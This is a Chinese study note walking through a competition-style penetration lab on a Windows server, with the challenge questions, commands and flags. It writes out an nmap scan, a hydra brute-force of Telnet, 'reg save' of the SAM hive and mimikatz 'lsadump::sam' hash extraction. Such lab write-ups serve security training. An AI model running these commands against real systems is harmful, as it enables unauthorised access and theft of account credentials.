个人学习记录
赛题综合练习
文章目录
- 个人学习记录
- 前言
- 一、解题过程
- 1.通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交;
- 2.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)
- 3.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将破解成功的密码当做FLAG进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)
- 4.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;
- 5.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;
- 6.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取teltest密码信息,将提取信息的命令作为FLAG提交;
- 总结
前言
路漫漫其修远兮,吾将上下而求索。
文章涉及命令和思路在总结
一、解题过程
1.通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交;
nmap -sV -A -p- 192.168.66.79
flag:{232}
2.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将hydra使用的必要参数当做FLAG进行提交(例:nmap -s -p 22);(字典路径/usr/share/wordlists/dirb/small.txt)
hydra -l teltest -P /usr/share/wordlists/dirb/small.txt telnet://192.168.66.79:232 -vV
flag:{hydral -l -P}
3.通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为teltest),将破解成功的密码当做FLAG进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)
flag{customer}
4.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;
flag{reg save HKLM\SAM C:/sam.hive}
5.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;
6.通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取teltest密码信息,将提取信息的命令作为FLAG提交;
先把提取的文件共享,如下图所示:
然后连接teltest,把文件下载到本地,如下图所示:
使用mimikatz工具提取teltest密码信息,如下图所示:
flag{lsadump::sam /sam:C:\sam.hive /system:C\system.hive}
总结
大概思路和涉及的知识点
nmap -sV -A -p- 是一个在命令行中使用的命令,它使用Nmap(网络映射)工具进行网络扫描。具体来说,‘nmap -sV -A -p-’ 的含义如下:
-
‘nmap’ 是Nmap工具的命令行接口。
-
‘-sV’ 选项表示使用 ‘service version’ 扫描,用于检测目标服务器上运行的网络服务及其版本。
-
‘-A’ 选项表示进行全面扫描,包括系统发现(discovery)和漏洞扫描。
-
‘-p-’ 表示扫描所有未指定的端口(即,所有在1-65535之间的端口)。
总的来说,这个命令的意思是使用Nmap工具对目标服务器进行全面扫描,包括检测服务版本、发现系统信息并扫描可能的漏洞,同时扫描所有在1-65535之间的端口。
hydra -l teltest -P /usr/share/wordlists/dirb/small.txt telnet://192.168.66.79:232 -vV
-l :指定破解的用户,对特定用户破解
-P 大写,指定密码字典
-vV 显示详细信息
思路:
nmap扫描,启用文件共享,远程连接telnet用户,hydra工具的使用,mimikatz工具的使用,学习以上知识点即可。